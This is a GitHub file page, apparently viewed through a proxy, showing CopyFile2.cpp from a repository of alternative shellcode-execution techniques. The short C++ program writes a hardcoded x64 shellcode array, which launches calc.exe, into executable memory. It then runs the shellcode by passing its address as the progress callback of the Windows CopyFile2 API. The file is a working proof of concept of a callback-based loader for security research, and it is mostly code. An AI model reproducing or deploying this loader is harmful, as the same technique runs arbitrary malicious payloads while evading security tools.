FazBrowse GitHub Viewer
|
Trending
|
URL:
|
Home
Tools:
[Download Repo ZIP]
[View Raw Code]
[Original HTTPS Page]
AlternativeShellcodeExec/CopyFile2/CopyFile2.cpp at master · aahmad097/AlternativeShellcodeExec · GitHub
aahmad097
/
AlternativeShellcodeExec
Public
Notifications
You must be signed in to change notification settings
Fork
336
Star
1.7k
Code
Issues
0
Pull requests
0
Actions
Projects
Security and quality
0
Insights
Additional navigation options
Code
Issues
Pull requests
Actions
Projects
Security and quality
Insights
Expand file tree
Breadcrumbs
AlternativeShellcodeExec
/
CopyFile2
/
CopyFile2.cpp
Copy path
More file actions
More file actions
Latest commit
History
History
History
56 lines (40 loc) · 1.9 KB
Breadcrumbs
AlternativeShellcodeExec
/
CopyFile2
/
CopyFile2.cpp
Copy path
File metadata and controls
56 lines (40 loc) · 1.9 KB
Raw
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#
include
<
windows.h
>
#
include
<
stdio.h
>
#
include
<
dpa_dsa.h
>
int
err
(
const
char
* errmsg) {
printf
(
"
Error: %s (%u)
\n
"
, errmsg, ::
GetLastError
());
return
1
;
}
//
alfarom256 calc shellcode
unsigned
char
op[] =
"
\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52
"
"
\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48
"
"
\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9
"
"
\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41
"
"
\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48
"
"
\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01
"
"
\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48
"
"
\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0
"
"
\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c
"
"
\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0
"
"
\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04
"
"
\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59
"
"
\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48
"
"
\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00
"
"
\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f
"
"
\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff
"
"
\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb
"
"
\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c
"
"
\x63\x2e\x65\x78\x65\x00
"
;
int
main
() {
LPVOID
addr = ::
VirtualAlloc
(
NULL
,
sizeof
(op),
MEM_COMMIT
,
PAGE_EXECUTE_READWRITE
);
::RtlMoveMemory
(addr, op,
sizeof
(op));
COPYFILE2_EXTENDED_PARAMETERS
params;
params.
dwSize
= {
sizeof
(params) };
params.
dwCopyFlags
=
COPY_FILE_FAIL_IF_EXISTS
;
params.
pfCancel
=
FALSE
;
params.
pProgressRoutine
= (
PCOPYFILE2_PROGRESS_ROUTINE
)addr;
params.
pvCallbackContext
=
nullptr
;
::DeleteFileW
(
L"
C:
\\
Windows
\\
Temp
\\
backup.log
"
);
::CopyFile2
(
L"
C:
\\
Windows
\\
DirectX.log
"
,
L"
C:
\\
Windows
\\
Temp
\\
backup.log
"
, ¶ms);
}
Back
|
FazBrowse Home
|
New Git URL